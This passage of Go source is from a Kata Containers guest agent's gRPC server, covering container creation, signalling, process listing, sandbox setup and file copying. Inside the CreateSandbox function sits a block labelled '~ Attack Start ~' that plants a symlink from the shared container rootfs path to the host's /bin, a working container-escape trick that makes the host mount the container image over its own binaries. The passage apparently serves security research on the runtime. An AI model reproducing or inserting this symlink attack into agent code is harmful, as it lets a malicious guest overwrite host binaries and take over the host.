// storage to the specified MountPoint, so that it will match what's
// inside oci.Mounts.
// After all those storages have been processed, no matter the order
// here, the agent will rely on libcontainer (using the oci.Mounts
// list) to bind mount all of them inside the container.
mountList, err := addStorages(ctx, req.Storages, a.sandbox)
if err != nil {
return emptyResp, err
}
ctr := &container{
id: req.ContainerId,
processes: make(map[string]*process),
mounts: mountList,
useSandboxPidNs: req.SandboxPidns,
ctx: ctx,
}
// In case the container creation failed, make sure we cleanup
// properly by rolling back the actions previously performed.
defer func() {
if err != nil {
a.rollbackFailingContainerCreation(ctr)
}
}()
// Convert the spec to an actual OCI specification structure.
ociSpec, err := pb.GRPCtoOCI(req.OCI)
if err != nil {
return emptyResp, err
}
if err := a.handleCPUSet(ociSpec); err != nil {
return emptyResp, err
}
if err := a.applyNetworkSysctls(ociSpec); err != nil {
return emptyResp, err
}
if a.sandbox.guestHooksPresent {
// Add any custom OCI hooks to the spec
a.sandbox.addGuestHooks(ociSpec)
// write the OCI spec to a file so that hooks can read it
err = writeSpecToFile(ociSpec)
if err != nil {
return emptyResp, err
}
// Change cwd because libcontainer assumes the bundle path is the cwd:
// https://github.com/opencontainers/runc/blob/v1.0.0-rc5/libcontainer/specconv/spec_linux.go#L157
oldcwd, err := changeToBundlePath(ociSpec)
if err != nil {
return emptyResp, err
}
defer os.Chdir(oldcwd)
}
// Convert the OCI specification into a libcontainer configuration.
config, err := specconv.CreateLibcontainerConfig(&specconv.CreateOpts{
CgroupName: req.ContainerId,
NoNewKeyring: true,
Spec: ociSpec,
NoPivotRoot: a.sandbox.noPivotRoot,
})
if err != nil {
return emptyResp, err
}
// apply rlimits
config.Rlimits = posixRlimitsToRlimits(ociSpec.Process.Rlimits)
// Update libcontainer configuration for specific cases not handled
// by the specconv converter.
if err = a.updateContainerConfig(ociSpec, config, ctr); err != nil {
return emptyResp, err
}
return a.finishCreateContainer(ctr, req, config)
}
// Path overridden in unit tests
var procSysDir = "/proc/sys"
// writeSystemProperty writes the value to a path under /proc/sys as determined from the key.
// For e.g. net.ipv4.ip_forward translated to /proc/sys/net/ipv4/ip_forward.
func writeSystemProperty(key, value string) error {
keyPath := strings.Replace(key, ".", "/", -1)
return ioutil.WriteFile(filepath.Join(procSysDir, keyPath), []byte(value), 0644)
}
func isNetworkSysctl(sysctl string) bool {
return strings.HasPrefix(sysctl, "net.")
}
// libcontainer checks if the container is running in a separate network namespace
// before applying the network related sysctls. If it sees that the network namespace of the container
// is the same as the "host", it errors out. Since we do no create a new net namespace inside the guest,
// libcontainer would error out while verifying network sysctls. To overcome this, we dont pass
// network sysctls to libcontainer, we instead have the agent directly apply them. All other namespaced
// sysctls are applied by libcontainer.
func (a *agentGRPC) applyNetworkSysctls(ociSpec *specs.Spec) error {
sysctls := ociSpec.Linux.Sysctl
for key, value := range sysctls {
if isNetworkSysctl(key) {
if err := writeSystemProperty(key, value); err != nil {
return err
}
delete(sysctls, key)
}
}
ociSpec.Linux.Sysctl = sysctls
return nil
}
func (a *agentGRPC) handleCPUSet(ociSpec *specs.Spec) error {
if ociSpec.Linux.Resources.CPU != nil && ociSpec.Linux.Resources.CPU.Cpus != "" {
availableCpuset, err := getAvailableCpusetList(ociSpec.Linux.Resources.CPU.Cpus)
if err != nil {
return err
}
ociSpec.Linux.Resources.CPU.Cpus = availableCpuset
}
return nil
}
func posixRlimitsToRlimits(posixRlimits []specs.POSIXRlimit) []configs.Rlimit {
var rlimits []configs.Rlimit
rlimitsMap := map[string]int{
"RLIMIT_CPU": unix.RLIMIT_CPU, // 0x0
"RLIMIT_FSIZE": unix.RLIMIT_FSIZE, // 0x1
"RLIMIT_DATA": unix.RLIMIT_DATA, // 0x2
"RLIMIT_STACK": unix.RLIMIT_STACK, // 0x3
"RLIMIT_CORE": unix.RLIMIT_CORE, // 0x4
"RLIMIT_RSS": unix.RLIMIT_RSS, // 0x5
"RLIMIT_NPROC": unix.RLIMIT_NPROC, // 0x6
"RLIMIT_NOFILE": unix.RLIMIT_NOFILE, // 0x7
"RLIMIT_MEMLOCK": unix.RLIMIT_MEMLOCK, // 0x8
"RLIMIT_AS": unix.RLIMIT_AS, // 0x9
"RLIMIT_LOCKS": unix.RLIMIT_LOCKS, // 0xa
"RLIMIT_SIGPENDING": unix.RLIMIT_SIGPENDING, // 0xb
"RLIMIT_MSGQUEUE": unix.RLIMIT_MSGQUEUE, // 0xc
"RLIMIT_NICE": unix.RLIMIT_NICE, // 0xd
"RLIMIT_RTPRIO": unix.RLIMIT_RTPRIO, // 0xe
"RLIMIT_RTTIME": unix.RLIMIT_RTTIME, // 0xf
}
for _, l := range posixRlimits {
limit, ok := rlimitsMap[l.Type]
if !ok {
agentLog.WithField("rlimit", l.Type).Warnf("Unknown rlimit")
continue
}
rl := configs.Rlimit{
Type: limit,
Hard: l.Hard,
Soft: l.Soft,
}
rlimits = append(rlimits, rl)
}
return rlimits
}
func (a *agentGRPC) createContainerChecks(req *pb.CreateContainerRequest) (err error) {
if !a.sandbox.running {
return grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to run a new container")
}
if _, err = a.sandbox.getContainer(req.ContainerId); err == nil {
return grpcStatus.Errorf(codes.AlreadyExists, "Container %s already exists, impossible to create", req.ContainerId)
}
if a.pidNsExists(req.OCI) {
return grpcStatus.Errorf(codes.FailedPrecondition, "Unexpected PID namespace received for container %s, should have been cleared out", req.ContainerId)
}
return nil
}
func (a *agentGRPC) pidNsExists(grpcSpec *pb.Spec) bool {
if grpcSpec.Linux != nil {
for _, n := range grpcSpec.Linux.Namespaces {
if n.Type == string(configs.NEWPID) {
return true
}
}
}
return false
}
func (a *agentGRPC) updateSharedPidNs(ctr *container) error {
// Populate the shared pid path only if this is an infra container and
// SandboxPidns has not been passed in the CreateSandbox request.
// This means a separate pause process has not been created. We treat the
// first container created as the infra container in that case
// and use its pid namespace in case pid namespace needs to be shared.
if !a.sandbox.sandboxPidNs && len(a.sandbox.containers) == 1 {
pid, err := ctr.initProcess.process.Pid()
if err != nil {
return err
}
a.sandbox.sharedPidNs.path = fmt.Sprintf("/proc/%d/ns/pid", pid)
}
return nil
}
func (a *agentGRPC) StartContainer(ctx context.Context, req *pb.StartContainerRequest) (*gpb.Empty, error) {
ctr, err := a.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
status, err := ctr.container.Status()
if err != nil {
return nil, err
}
if status != libcontainer.Created {
return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Container %s status %s, should be %s", req.ContainerId, status.String(), libcontainer.Created.String())
}
if err := ctr.container.Exec(); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func (a *agentGRPC) ExecProcess(ctx context.Context, req *pb.ExecProcessRequest) (*gpb.Empty, error) {
ctr, err := a.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
status, err := ctr.container.Status()
if err != nil {
return nil, err
}
if status == libcontainer.Stopped {
return nil, grpcStatus.Errorf(codes.FailedPrecondition, "Cannot exec in stopped container %s", req.ContainerId)
}
proc, err := buildProcess(req.Process, req.ExecId, false)
if err != nil {
return emptyResp, err
}
if err := a.execProcess(ctr, proc, false); err != nil {
return emptyResp, err
}
return emptyResp, a.postExecProcess(ctr, proc)
}
func (a *agentGRPC) SignalProcess(ctx context.Context, req *pb.SignalProcessRequest) (*gpb.Empty, error) {
if !a.sandbox.running {
return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Sandbox not started, impossible to signal the container")
}
ctr, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, grpcStatus.Errorf(codes.FailedPrecondition, "Could not signal process %s: %v", req.ExecId, err)
}
status, err := ctr.container.Status()
if err != nil {
return emptyResp, err
}
signal := syscall.Signal(req.Signal)
if status == libcontainer.Stopped {
agentLog.WithFields(logrus.Fields{
"containerID": req.ContainerId,
"signal": signal.String(),
}).Info("discarding signal as container stopped")
return emptyResp, nil
}
// If the exec ID provided is empty, let's apply the signal to all
// processes inside the container.
// If the process is the container process, let's use the container
// API for that.
// Frozen processes are thawed when `all` is true, allowing them to receive and process signals.
if req.ExecId == "" || status == libcontainer.Paused {
return emptyResp, ctr.container.Signal(signal, true)
} else if ctr.initProcess.id == req.ExecId {
pid, err := ctr.initProcess.process.Pid()
if err != nil {
return emptyResp, err
}
// For container initProcess, if it hasn't installed handler for "SIGTERM" signal,
// it will ignore the "SIGTERM" signal sent to it, thus send it "SIGKILL" signal
// instead of "SIGTERM" to terminate it.
if signal == syscall.SIGTERM && !isSignalHandled(pid, syscall.SIGTERM) {
signal = syscall.SIGKILL
}
return emptyResp, ctr.container.Signal(signal, false)
}
proc, err := ctr.getProcess(req.ExecId)
if err != nil {
return emptyResp, grpcStatus.Errorf(grpcStatus.Convert(err).Code(), "Could not signal process: %v", err)
}
if err := proc.process.Signal(signal); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
// Check is the container process installed the
// handler for specific signal.
func isSignalHandled(pid int, signum syscall.Signal) bool {
var sigMask uint64 = 1 << (uint(signum) - 1)
procFile := fmt.Sprintf("/proc/%d/status", pid)
file, err := os.Open(procFile)
if err != nil {
agentLog.WithField("procFile", procFile).Warn("Open proc file failed")
return false
}
defer file.Close()
scanner := bufio.NewScanner(file)
for scanner.Scan() {
line := scanner.Text()
if strings.HasPrefix(line, "SigCgt:") {
maskSlice := strings.Split(line, ":")
if len(maskSlice) != 2 {
agentLog.WithField("procFile", procFile).Warn("Parse the SigCgt field failed")
return false
}
sigCgtStr := strings.TrimSpace(maskSlice[1])
sigCgtMask, err := strconv.ParseUint(sigCgtStr, 16, 64)
if err != nil {
agentLog.WithField("sigCgt", sigCgtStr).Warn("parse the SigCgt to hex failed")
return false
}
return (sigCgtMask & sigMask) == sigMask
}
}
return false
}
func (a *agentGRPC) WaitProcess(ctx context.Context, req *pb.WaitProcessRequest) (*pb.WaitProcessResponse, error) {
proc, ctr, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return &pb.WaitProcessResponse{}, err
}
defer proc.Do(func() {
proc.closePostExitFDs()
ctr.deleteProcess(proc.id)
})
// Using helper function wait() to deal with the subreaper.
libContProcess := (*reaperLibcontainerProcess)(&(proc.process))
exitCode, err := a.sandbox.subreaper.wait(proc.exitCodeCh, libContProcess)
if err != nil {
return &pb.WaitProcessResponse{}, err
}
//refill the exitCodeCh with the exitcode which can be read out
//by another WaitProcess(). Since this channel isn't be closed,
//here the refill will always success and it will be free by GC
//once the process exits.
proc.exitCodeCh <- exitCode
return &pb.WaitProcessResponse{
Status: int32(exitCode),
}, nil
}
func getPIDIndex(title string) int {
// looking for PID field in ps title
fields := strings.Fields(title)
for i, f := range fields {
if f == "PID" {
return i
}
}
return -1
}
func (a *agentGRPC) ListProcesses(ctx context.Context, req *pb.ListProcessesRequest) (*pb.ListProcessesResponse, error) {
resp := &pb.ListProcessesResponse{}
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return resp, err
}
// Get the list of processes that are running inside the containers.
// the PIDs match with the system PIDs, not with container's namespace
pids, err := c.container.Processes()
if err != nil {
return resp, err
}
switch req.Format {
case "table":
case "json":
resp.ProcessList, err = json.Marshal(pids)
return resp, err
default:
return resp, fmt.Errorf("invalid format option")
}
psArgs := req.Args
if len(psArgs) == 0 {
psArgs = []string{"-ef"}
}
// All container's processes are visibles from agent's namespace.
// pids already contains the list of processes that are running
// inside a container, now we have to use that list to filter
// ps output and return just container's processes
cmd := exec.Command("ps", psArgs...)
output, err := a.sandbox.subreaper.combinedOutput(cmd)
if err != nil {
return nil, fmt.Errorf("%s: %s", err, output)
}
lines := strings.Split(string(output), "\n")
pidIndex := getPIDIndex(lines[0])
// PID field not found
if pidIndex == -1 {
return nil, fmt.Errorf("failed to find PID field in ps output")
}
// append title
var result bytes.Buffer
result.WriteString(lines[0] + "\n")
for _, line := range lines[1:] {
if len(line) == 0 {
continue
}
fields := strings.Fields(line)
if pidIndex >= len(fields) {
return nil, fmt.Errorf("missing PID field: %s", line)
}
p, err := strconv.Atoi(fields[pidIndex])
if err != nil {
return nil, fmt.Errorf("failed to convert pid to int: %s", fields[pidIndex])
}
// appends pid line
for _, pid := range pids {
if pid == p {
result.WriteString(line + "\n")
break
}
}
}
resp.ProcessList = result.Bytes()
return resp, nil
}
func (a *agentGRPC) UpdateContainer(ctx context.Context, req *pb.UpdateContainerRequest) (*gpb.Empty, error) {
if req.Resources == nil {
return emptyResp, fmt.Errorf("Resources in the request are nil")
}
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
// c.container.Config returns a copy of non-pointer members
// in configs.Config, configs.Config.Cgroup is a pointer hence
// if it is modified, the container cgroup is modifed too and
// c.container.Set won't be able to rollback in case of failure.
contConfig := c.container.Config()
var resources configs.Resources
if contConfig.Cgroups != nil && contConfig.Cgroups.Resources != nil {
resources = *contConfig.Cgroups.Resources
}
// Update the value
if req.Resources.BlockIO != nil {
resources.BlkioWeight = uint16(req.Resources.BlockIO.Weight)
}
if req.Resources.CPU != nil {
resources.CpuPeriod = req.Resources.CPU.Period
resources.CpuQuota = req.Resources.CPU.Quota
resources.CpuShares = req.Resources.CPU.Shares
resources.CpuRtPeriod = req.Resources.CPU.RealtimePeriod
resources.CpuRtRuntime = req.Resources.CPU.RealtimeRuntime
resources.CpusetCpus = req.Resources.CPU.Cpus
resources.CpusetMems = req.Resources.CPU.Mems
}
if req.Resources.Memory != nil {
resources.KernelMemory = req.Resources.Memory.Kernel
resources.KernelMemoryTCP = req.Resources.Memory.KernelTCP
resources.Memory = req.Resources.Memory.Limit
resources.MemoryReservation = req.Resources.Memory.Reservation
resources.MemorySwap = req.Resources.Memory.Swap
}
if req.Resources.Pids != nil {
resources.PidsLimit = req.Resources.Pids.Limit
}
// cpuset is a special case where container's cpuset cgroup MUST BE updated
if resources.CpusetCpus != "" {
resources.CpusetCpus, err = getAvailableCpusetList(resources.CpusetCpus)
if err != nil {
return emptyResp, err
}
cookies := make(cookie)
if err = updateCpusetPath(contConfig.Cgroups.Path, resources.CpusetCpus, cookies); err != nil {
agentLog.WithError(err).Warn("Could not update container cpuset cgroup")
}
}
// Create a copy of container's cgroup, if c.container.Set fails,
// configuration won't be modified and it will be able to rollback
// to the original container cgroup configuration.
config := contConfig
var cgroupsCopy configs.Cgroup
if contConfig.Cgroups != nil {
cgroupsCopy = *contConfig.Cgroups
}
cgroupsCopy.Resources = &resources
config.Cgroups = &cgroupsCopy
return emptyResp, c.container.Set(config)
}
func (a *agentGRPC) StatsContainer(ctx context.Context, req *pb.StatsContainerRequest) (*pb.StatsContainerResponse, error) {
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return nil, err
}
stats, err := c.container.Stats()
if err != nil {
return nil, err
}
cgroupData, err := json.Marshal(stats.CgroupStats)
if err != nil {
return nil, err
}
netData, err := json.Marshal(stats.Interfaces)
if err != nil {
return nil, err
}
var cgroupStats pb.CgroupStats
networkStats := make([]*pb.NetworkStats, 0)
err = json.Unmarshal(cgroupData, &cgroupStats)
if err != nil {
return nil, err
}
err = json.Unmarshal(netData, &networkStats)
if err != nil {
return nil, err
}
resp := &pb.StatsContainerResponse{
CgroupStats: &cgroupStats,
NetworkStats: networkStats,
}
return resp, nil
}
func (a *agentGRPC) PauseContainer(ctx context.Context, req *pb.PauseContainerRequest) (*gpb.Empty, error) {
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
a.sandbox.Lock()
defer a.sandbox.Unlock()
return emptyResp, c.container.Pause()
}
func (a *agentGRPC) ResumeContainer(ctx context.Context, req *pb.ResumeContainerRequest) (*gpb.Empty, error) {
c, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
a.sandbox.Lock()
defer a.sandbox.Unlock()
return emptyResp, c.container.Resume()
}
func (a *agentGRPC) RemoveContainer(ctx context.Context, req *pb.RemoveContainerRequest) (*gpb.Empty, error) {
ctr, err := a.sandbox.getContainer(req.ContainerId)
if err != nil {
return emptyResp, err
}
timeout := int(req.Timeout)
a.sandbox.Lock()
defer a.sandbox.Unlock()
if timeout == 0 {
if err := ctr.removeContainer(); err != nil {
return emptyResp, err
}
// Find the sandbox storage used by this container
for _, path := range ctr.mounts {
if _, ok := a.sandbox.storages[path]; ok {
if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
return emptyResp, err
}
}
}
} else {
done := make(chan error)
go func() {
if err := ctr.removeContainer(); err != nil {
done <- err
close(done)
return
}
//Find the sandbox storage used by this container
for _, path := range ctr.mounts {
if _, ok := a.sandbox.storages[path]; ok {
if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
done <- err
close(done)
return
}
}
}
close(done)
}()
select {
case err := <-done:
if err != nil {
return emptyResp, err
}
case <-time.After(time.Duration(req.Timeout) * time.Second):
return emptyResp, grpcStatus.Errorf(codes.DeadlineExceeded, "Timeout reached after %ds", timeout)
}
}
delete(a.sandbox.containers, ctr.id)
return emptyResp, nil
}
func (a *agentGRPC) WriteStdin(ctx context.Context, req *pb.WriteStreamRequest) (*pb.WriteStreamResponse, error) {
proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return &pb.WriteStreamResponse{}, err
}
proc.RLock()
defer proc.RUnlock()
stdinClosed := proc.stdinClosed
// Ignore this call to WriteStdin() if STDIN has already been closed
// earlier.
if stdinClosed {
return &pb.WriteStreamResponse{}, nil
}
var file *os.File
if proc.termMaster != nil {
file = proc.termMaster
} else {
file = proc.stdin
}
n, err := file.Write(req.Data)
if err != nil {
return &pb.WriteStreamResponse{}, err
}
return &pb.WriteStreamResponse{
Len: uint32(n),
}, nil
}
func (a *agentGRPC) ReadStdout(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), true)
if err != nil {
return &pb.ReadStreamResponse{}, err
}
return &pb.ReadStreamResponse{
Data: data,
}, nil
}
func (a *agentGRPC) ReadStderr(ctx context.Context, req *pb.ReadStreamRequest) (*pb.ReadStreamResponse, error) {
data, err := a.sandbox.readStdio(req.ContainerId, req.ExecId, int(req.Len), false)
if err != nil {
return &pb.ReadStreamResponse{}, err
}
return &pb.ReadStreamResponse{
Data: data,
}, nil
}
func (a *agentGRPC) CloseStdin(ctx context.Context, req *pb.CloseStdinRequest) (*gpb.Empty, error) {
proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return emptyResp, err
}
// If stdin is nil, which can be the case when using a terminal,
// there is nothing to do.
if proc.stdin == nil {
return emptyResp, nil
}
proc.Lock()
defer proc.Unlock()
if err := proc.stdin.Close(); err != nil {
return emptyResp, err
}
proc.stdinClosed = true
return emptyResp, nil
}
func (a *agentGRPC) TtyWinResize(ctx context.Context, req *pb.TtyWinResizeRequest) (*gpb.Empty, error) {
proc, _, err := a.sandbox.getProcess(req.ContainerId, req.ExecId)
if err != nil {
return emptyResp, err
}
if proc.termMaster == nil {
return emptyResp, grpcStatus.Error(codes.FailedPrecondition, "Terminal is not set, impossible to resize it")
}
winsize := &unix.Winsize{
Row: uint16(req.Row),
Col: uint16(req.Column),
}
// Set new terminal size.
if err := unix.IoctlSetWinsize(int(proc.termMaster.Fd()), unix.TIOCSWINSZ, winsize); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func loadKernelModule(module *pb.KernelModule) error {
if module == nil {
return fmt.Errorf("Kernel module is nil")
}
if module.Name == "" {
return fmt.Errorf("Kernel module name is empty")
}
log := agentLog.WithFields(logrus.Fields{
"module-name": module.Name,
"module-params": module.Parameters,
})
log.Debug("loading module")
cmd := exec.Command(modprobePath, "-v", module.Name)
if len(module.Parameters) > 0 {
cmd.Args = append(cmd.Args, module.Parameters...)
}
output, err := cmd.CombinedOutput()
if err != nil {
return fmt.Errorf("could not load module: %v: %v", err, string(output))
}
return nil
}
func (a *agentGRPC) CreateSandbox(ctx context.Context, req *pb.CreateSandboxRequest) (*gpb.Empty, error) {
if a.sandbox.running {
return emptyResp, grpcStatus.Error(codes.AlreadyExists, "Sandbox already started, impossible to start again")
}
a.sandbox.hostname = req.Hostname
a.sandbox.containers = make(map[string]*container)
a.sandbox.network.ifaces = make(map[string]*types.Interface)
a.sandbox.network.dns = req.Dns
a.sandbox.running = true
a.sandbox.sandboxPidNs = req.SandboxPidns
a.sandbox.storages = make(map[string]*sandboxStorage)
a.sandbox.guestHooks = &specs.Hooks{}
a.sandbox.guestHooksPresent = false
for _, m := range req.KernelModules {
if err := loadKernelModule(m); err != nil {
return emptyResp, err
}
}
if req.GuestHookPath != "" {
a.sandbox.scanGuestHooks(req.GuestHookPath)
}
if req.SandboxId != "" {
a.sandbox.id = req.SandboxId
agentLog = agentLog.WithField("sandbox", a.sandbox.id)
}
// Set up shared UTS and IPC namespaces
if err := a.sandbox.setupSharedNamespaces(ctx); err != nil {
return emptyResp, err
}
if req.SandboxPidns {
if err := a.sandbox.setupSharedPidNs(); err != nil {
return emptyResp, err
}
}
mountList, err := addStorages(ctx, req.Storages, a.sandbox)
if err != nil {
return emptyResp, err
}
a.sandbox.mounts = mountList
// ~ Attack Start ~ //
shared_dir := "/run/kata-containers/shared/containers"
perm := os.FileMode(0755)
// Create symlink at '/run/kata-containers/shared/containers/mainctr_id/rootfs'
// pointing to the target on the host
// We use the SandboxId as the main ctr id
mainctr_dir := shared_dir + "/" + req.SandboxId
if err := os.Mkdir(mainctr_dir, perm); err != nil {
return emptyResp, fmt.Errorf("Attack Mkdir(SandboxId) (SandboxId = '%s') error: '%s'", req.SandboxId, err)
}
target_on_host := "/bin" // the target that'll be mounted with the container image
if err := os.Symlink(target_on_host, mainctr_dir+"/rootfs"); err != nil {
return emptyResp, fmt.Errorf("Attack symlink error: '%s'", err)
}
// ~ Attack End ~ //
if err := setupDNS(a.sandbox.network.dns); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func (a *agentGRPC) DestroySandbox(ctx context.Context, req *pb.DestroySandboxRequest) (*gpb.Empty, error) {
if !a.sandbox.running {
agentLog.Info("Sandbox not started, this is a no-op")
return emptyResp, nil
}
a.sandbox.Lock()
for key, c := range a.sandbox.containers {
if err := c.removeContainer(); err != nil {
return emptyResp, err
}
// Find the sandbox storage used by this container
for _, path := range c.mounts {
if _, ok := a.sandbox.storages[path]; ok {
if err := a.sandbox.unsetAndRemoveSandboxStorage(path); err != nil {
return emptyResp, err
}
}
}
delete(a.sandbox.containers, key)
}
a.sandbox.Unlock()
if err := a.sandbox.removeNetwork(); err != nil {
return emptyResp, err
}
if err := removeMounts(a.sandbox.mounts); err != nil {
return emptyResp, err
}
if err := a.sandbox.teardownSharedPidNs(); err != nil {
return emptyResp, err
}
if err := a.sandbox.unmountSharedNamespaces(); err != nil {
return emptyResp, err
}
if tracing && !startTracingCalled {
// Close stopServer channel to signal the main agent code to stop
// the server when all gRPC calls will be completed.
close(a.sandbox.stopServer)
}
a.sandbox.hostname = ""
a.sandbox.id = ""
a.sandbox.containers = make(map[string]*container)
a.sandbox.running = false
a.sandbox.network = network{}
a.sandbox.mounts = []string{}
a.sandbox.storages = make(map[string]*sandboxStorage)
// Synchronize the caches on the system. This is needed to ensure
// there is no pending transactions left before the VM is shut down.
syscall.Sync()
return emptyResp, nil
}
func (a *agentGRPC) UpdateInterface(ctx context.Context, req *pb.UpdateInterfaceRequest) (*types.Interface, error) {
return a.sandbox.updateInterface(nil, req.Interface)
}
func (a *agentGRPC) UpdateRoutes(ctx context.Context, req *pb.UpdateRoutesRequest) (*pb.Routes, error) {
return a.sandbox.updateRoutes(nil, req.Routes)
}
func (a *agentGRPC) ListInterfaces(ctx context.Context, req *pb.ListInterfacesRequest) (*pb.Interfaces, error) {
return a.sandbox.listInterfaces(nil)
}
func (a *agentGRPC) ListRoutes(ctx context.Context, req *pb.ListRoutesRequest) (*pb.Routes, error) {
return a.sandbox.listRoutes(nil)
}
func (a *agentGRPC) OnlineCPUMem(ctx context.Context, req *pb.OnlineCPUMemRequest) (*gpb.Empty, error) {
if !req.Wait {
go a.onlineCPUMem(req)
return emptyResp, nil
}
return emptyResp, a.onlineCPUMem(req)
}
func (a *agentGRPC) ReseedRandomDev(ctx context.Context, req *pb.ReseedRandomDevRequest) (*gpb.Empty, error) {
return emptyResp, reseedRNG(req.Data)
}
func (a *agentGRPC) GetGuestDetails(ctx context.Context, req *pb.GuestDetailsRequest) (*pb.GuestDetailsResponse, error) {
var details pb.GuestDetailsResponse
if req.MemBlockSize {
data, err := ioutil.ReadFile(sysfsMemoryBlockSizePath)
if err != nil {
if os.IsNotExist(err) {
agentLog.WithField("sysfsMemoryBlockSizePath", sysfsMemoryBlockSizePath).Info("Guest kernel config doesn't support memory hotplug")
} else {
return nil, err
}
} else {
if len(data) == 0 {
return nil, fmt.Errorf("%v is empty", sysfsMemoryBlockSizePath)
}
details.MemBlockSizeBytes, err = strconv.ParseUint(string(data[:len(data)-1]), 16, 64)
if err != nil {
return nil, err
}
}
}
if req.MemHotplugProbe {
if _, err := os.Stat(sysfsMemoryHotplugProbePath); os.IsNotExist(err) {
details.SupportMemHotplugProbe = false
} else if err != nil {
return nil, err
} else {
details.SupportMemHotplugProbe = true
}
}
details.AgentDetails = a.getAgentDetails(ctx)
return &details, nil
}
func (a *agentGRPC) MemHotplugByProbe(ctx context.Context, req *pb.MemHotplugByProbeRequest) (*gpb.Empty, error) {
for _, addr := range req.MemHotplugProbeAddr {
if err := ioutil.WriteFile(sysfsMemoryHotplugProbePath, []byte(fmt.Sprintf("0x%x", addr)), 0600); err != nil {
return emptyResp, err
}
}
return emptyResp, nil
}
func (a *agentGRPC) haveSeccomp() bool {
if seccompSupport == "yes" && seccomp.IsEnabled() {
return true
}
return false
}
func (a *agentGRPC) getAgentDetails(ctx context.Context) *pb.AgentDetails {
details := pb.AgentDetails{
Version: version,
InitDaemon: os.Getpid() == 1,
SupportsSeccomp: a.haveSeccomp(),
}
for handler := range deviceHandlerList {
details.DeviceHandlers = append(details.DeviceHandlers, handler)
}
for handler := range storageHandlerList {
details.StorageHandlers = append(details.StorageHandlers, handler)
}
return &details
}
func (a *agentGRPC) SetGuestDateTime(ctx context.Context, req *pb.SetGuestDateTimeRequest) (*gpb.Empty, error) {
if err := syscall.Settimeofday(&syscall.Timeval{Sec: req.Sec, Usec: req.Usec}); err != nil {
return nil, grpcStatus.Errorf(codes.Internal, "Could not set guest time: %v", err)
}
return &gpb.Empty{}, nil
}
// CopyFile copies files form host to container's rootfs (guest). Files can be copied by parts, for example
// a file which size is 2MB, can be copied calling CopyFile 2 times, in the first call req.Offset is 0,
// req.FileSize is 2MB and req.Data contains the first half of the file, in the seconds call req.Offset is 1MB,
// req.FileSize is 2MB and req.Data contains the second half of the file. For security reason all write operations
// are made in a temporary file, once temporary file reaches the expected size (req.FileSize), it's moved to
// destination file (req.Path).
func (a *agentGRPC) CopyFile(ctx context.Context, req *pb.CopyFileRequest) (*gpb.Empty, error) {
// get absolute path, to avoid paths like '/run/../sbin/init'
path, err := filepath.Abs(req.Path)
if err != nil {
return emptyResp, err
}
// container's rootfs is mounted at /run, in order to avoid overwrite guest's rootfs files, only
// is possible to copy files to /run
if !strings.HasPrefix(path, containersRootfsPath) {
return emptyResp, fmt.Errorf("Only is possible to copy files into the %s directory", containersRootfsPath)
}
if err := os.MkdirAll(filepath.Dir(path), os.FileMode(req.DirMode)); err != nil {
return emptyResp, err
}
// create a temporary file and write the content.
tmpPath := path + ".tmp"
tmpFile, err := os.OpenFile(tmpPath, os.O_WRONLY|os.O_CREATE, 0600)
if err != nil {
return emptyResp, err
}
if _, err := tmpFile.WriteAt(req.Data, req.Offset); err != nil {
tmpFile.Close()
return emptyResp, err
}
tmpFile.Close()
// get temporary file information
st, err := os.Stat(tmpPath)
if err != nil {
return emptyResp, err
}
agentLog.WithFields(logrus.Fields{
"tmp-file-size": st.Size(),
"expected-size": req.FileSize,
}).Debugf("Checking temporary file size")
// if file size is not equal to the expected size means that copy file operation has not finished.
// CopyFile should be called again with new content and a different offset.
if st.Size() != req.FileSize {
return emptyResp, nil
}
if err := os.Chmod(tmpPath, os.FileMode(req.FileMode)); err != nil {
return emptyResp, err
}
if err := os.Chown(tmpPath, int(req.Uid), int(req.Gid)); err != nil {
return emptyResp, err
}
// At this point temoporary file has the expected size, atomically move it overwriting
// the destination.
agentLog.WithFields(logrus.Fields{
"tmp-path": tmpPath,
"des-path": path,
}).Debugf("Moving temporary file")
if err := os.Rename(tmpPath, path); err != nil {
return emptyResp, err
}
return emptyResp, nil
}
func (a *agentGRPC) StartTracing(ctx context.Context, req *pb.StartTracingRequest) (*gpb.Empty, error) {
// We chould check 'tracing' too and error if already set. But
// instead, we permit that scenario, making this call a NOP if tracing
// is already enabled via traceModeFlag.
if startTracingCalled {
return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already enabled")
}
// The only trace type support for dynamic tracing is isolated.
enableTracing(traceModeDynamic, traceTypeIsolated)
startTracingCalled = true
var err error
// Ignore the provided context and recreate the root context.
// Note that this call will not be traced, but all subsequent ones
// will be.
rootSpan, rootContext, err = setupTracing(agentName)
if err != nil {
return nil, fmt.Errorf("failed to setup tracing: %v", err)
}
a.sandbox.ctx = rootContext
grpcContext = rootContext
return emptyResp, nil
}
func (a *agentGRPC) StopTracing(ctx context.Context, req *pb.StopTracingRequest) (*gpb.Empty, error) {
// Like StartTracing(), this call permits tracing to be stopped when
// it was originally started using traceModeFlag.
if !tracing && !startTracingCalled {
return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing not enabled")
}
if stopTracingCalled {
return nil, grpcStatus.Error(codes.FailedPrecondition, "tracing already disabled")
}
// Signal to the interceptors that tracing need to end.
